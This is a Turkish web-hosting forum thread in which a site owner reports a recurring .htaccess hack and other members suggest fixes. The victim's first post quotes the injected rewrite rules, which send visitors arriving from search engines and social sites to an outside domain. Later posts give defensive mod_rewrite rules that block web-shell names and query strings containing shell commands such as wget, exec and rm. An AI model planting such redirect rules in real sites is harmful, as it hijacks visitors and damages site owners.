• 31-08-2012, 09:38:01
    #1
    Merhaba arkadaşlar,
    Sitemin .htaccess dosyası chmod değerleri 444 olmasına rağmen sürekli saldırıya uğruyor. Tüm dosyalarımı PC'ye indirip iframe ve virüs taraması yaptım ve geri yükledim. Üzerine ftp bilgilerimi değiştirmeme rağmen sonuç aynı. Bundan nasıl kurtulabileceğim konusunda bana yardımcı olabilecek biri var mı?

    .htaccess dosyası içine eklenen dosyalar şu şekilde..
    <IfModule mod_rewrite.c>																														
    RewriteEngine On																														
    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|infospace)\.(.*)																														
    RewriteRule ^(.*)$ http://deafmassachusetts.info/Conference?8 [R=301,L]																														
    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*)																														
    RewriteRule ^(.*)$ http://deafmassachusetts.info/Conference?8 [R=301,L]																														
    </IfModule>																														
    
    ErrorDocument 500 http://deafmassachusetts.info/Conference?8
  • 31-08-2012, 09:41:31
    #2
    Hocam başka bilgisayardan ftp değiştirip format atmanızı tavsiye ederim
  • 31-08-2012, 12:53:49
    #3
    .htaccess kod örneğiniz gözükmüyor ancak, site dosyalarınız arasında bir shell dosyası olabilir ve bu şekilde dosyalarınızı editliyor olabilirler.

    Not: bu shell dosyası sadece sizin dosyalarınızda da olmayabilir sunucuda çalışan diğer sitelerde olan bir shell üzerinden de sizin dosyalarınıza erişerek işlem yapabilirler.

    Sunucu size ait ise, iyi bir güvenlik konfirgasyonu yaptırmanızı öneririm. Eğer bir hosting hizmeti alıyorsanız durumu hizmet aldığınız yer ile görüşmeniz daha iyi olacaktır.
  • 31-08-2012, 19:01:17
    #4
    Mirzakul teşekkür ederim ama bu çözüm olmadı..

    acme teşekkür ederim. Sunucu hizmeti aldığım yere durumu bildirdim. Bakalım nasıl bir dönüş olacak. .htaccess dosyasını siliyor olmama rağmen yeniden oluşuyor. Dediğin gibi shell dosyası olabilir.
  • 31-08-2012, 19:02:20
    #5
    iframe virüsü yemişsin. pc ne format at veya kaspersky indirip tam tarama yaptır.

    ama önce başka bir ftp şiresini değiştir.
  • 01-09-2012, 10:11:51
    #6
    Administrator
    Burada yazılanlara göz atabilirsiniz.

    http://blog.megatrhost.com/sitelerin...ara-cozum.html
  • 02-12-2012, 16:40:56
    #7
    Üyeliği durduruldu
    hocam su kodları eklersenız sitenizde shell vs çalışmasını engellemıs olursunuz
    RewriteCond %{REQUEST_URI} .*((php|my)?shell|remview.*|phpremoteview.*|sshphp .*|pcom|nstview.*|c99|r57|webadmin.*|phpget.*|phpw riter.*|fileditor.*|locus7.*|storm7.*)\.(p?s?x?htm ?l?|txt|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml) [NC,OR]
    RewriteCond %{REQUEST_METHOD} (GET|POST) [NC]
    RewriteCond %{QUERY_STRING} ^(.*)=/home(.+)?/ftpyolunuzuyazın/(.*)$ [OR]
    RewriteCond %{QUERY_STRING} ^work_dir=.*$ [OR]
    RewriteCond %{QUERY_STRING} ^command=.*&output.*$ [OR]
    RewriteCond %{QUERY_STRING} ^nts_[a-z0-9_]{0,10}=.*$ [OR]
    RewriteCond %{QUERY_STRING} ^(.*)cmd=.*$ [OR] ## user_devil BU KURALA DIKKAT SITENIZIN CALISMASINI ENGELLEYEBILIR ENGELLERSE BU SATIRI SILERSIN##
    RewriteCond %{QUERY_STRING} ^c=(t|setup|codes)$ [OR]
    RewriteCond %{QUERY_STRING} ^act=((about|cmd|selfremove|chbd|trojan|backc|mass browsersploit|exploits|grablogins|upload.*)|((chmo d|f)&f=.*))$ [OR]
    RewriteCond %{QUERY_STRING} ^act=(ls|search|fsbuff|encoder|tools|processes|ftp quickbrute|security|sql|eval|update|feedback|cmd|g ofile|mkfile)&d=.*$ [OR]
    RewriteCond %{QUERY_STRING} ^&?c=(l?v?i?&d=|v&fnot=|setup&ref=|l&r=|d&d=|tree& d|t&d=|e&d=|i&d=|codes|md5crack).*$ [OR]
    RewriteCond %{QUERY_STRING} ^(.*)([-_a-z]{1,15})=(ls|cd|cat|rm|mv|vim|chmod|chdir|mkdir|rmd ir|pwd|clear|whoami|uname|tar|zip|unzip|tar|gzip|g unzip|grep|more|ln|umask|telnet|ssh|ftp|head|tail| which|mkmode|touch|logname|edit_file|search_text|f ind_text|php_eval|download_file|ftp_file_down|ftp_ file_up|ftp_brute|mail_file|mysql|mysql_dump|db_qu ery)([^a-zA-Z0-9].+)*$ [OR]
    RewriteCond %{QUERY_STRING} ^(.*)(wget|shell_exec|passthru|system|exec|popen|p roc_open)(.*)$
    <files confing_dosyanız_adı_neyse.php>
    order allow,deny
    deny from all
    </files>
    <files .htaccess>
    order allow,deny
    deny from all
    </files>
  • 03-12-2012, 18:11:04
    #8
    osbdata adlı üyeden alıntı: mesajı görüntüle
    hocam su kodları eklersenız sitenizde shell vs çalışmasını engellemıs olursunuz
    RewriteCond %{REQUEST_URI} .*((php|my)?shell|remview.*|phpremoteview.*|sshphp .*|pcom|nstview.*|c99|r57|webadmin.*|phpget.*|phpw riter.*|fileditor.*|locus7.*|storm7.*)\.(p?s?x?htm ?l?|txt|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml) [NC,OR]
    RewriteCond %{REQUEST_METHOD} (GET|POST) [NC]
    RewriteCond %{QUERY_STRING} ^(.*)=/home(.+)?/nettetes/(.*)$ [OR]
    RewriteCond %{QUERY_STRING} ^work_dir=.*$ [OR]
    RewriteCond %{QUERY_STRING} ^command=.*&output.*$ [OR]
    RewriteCond %{QUERY_STRING} ^nts_[a-z0-9_]{0,10}=.*$ [OR]
    RewriteCond %{QUERY_STRING} ^(.*)cmd=.*$ [OR] ## user_devil BU KURALA DIKKAT SITENIZIN CALISMASINI ENGELLEYEBILIR ENGELLERSE BU SATIRI SILERSIN##
    RewriteCond %{QUERY_STRING} ^c=(t|setup|codes)$ [OR]
    RewriteCond %{QUERY_STRING} ^act=((about|cmd|selfremove|chbd|trojan|backc|mass browsersploit|exploits|grablogins|upload.*)|((chmo d|f)&f=.*))$ [OR]
    RewriteCond %{QUERY_STRING} ^act=(ls|search|fsbuff|encoder|tools|processes|ftp quickbrute|security|sql|eval|update|feedback|cmd|g ofile|mkfile)&d=.*$ [OR]
    RewriteCond %{QUERY_STRING} ^&?c=(l?v?i?&d=|v&fnot=|setup&ref=|l&r=|d&d=|tree& d|t&d=|e&d=|i&d=|codes|md5crack).*$ [OR]
    RewriteCond %{QUERY_STRING} ^(.*)([-_a-z]{1,15})=(ls|cd|cat|rm|mv|vim|chmod|chdir|mkdir|rmd ir|pwd|clear|whoami|uname|tar|zip|unzip|tar|gzip|g unzip|grep|more|ln|umask|telnet|ssh|ftp|head|tail| which|mkmode|touch|logname|edit_file|search_text|f ind_text|php_eval|download_file|ftp_file_down|ftp_ file_up|ftp_brute|mail_file|mysql|mysql_dump|db_qu ery)([^a-zA-Z0-9].+)*$ [OR]
    RewriteCond %{QUERY_STRING} ^(.*)(wget|shell_exec|passthru|system|exec|popen|p roc_open)(.*)$
    iş görmez, yine config dosyaları okunabilir.
  • 04-12-2012, 16:28:22
    #9
    Üyeliği durduruldu
    byMicro adlı üyeden alıntı: mesajı görüntüle
    iş görmez, yine config dosyaları okunabilir.
    onada sunu yazabilirsiniz örnek olarak
    <files confing dosyanız_adı_neyse.php>
    order allow,deny
    deny from all
    </files>
    ve ön önemlisini unutmusum
    <files .htaccess>
    order allow,deny
    deny from all
    </files>
    da eklemenizde fayda var ki htaccess dosyanıza da erisilemesin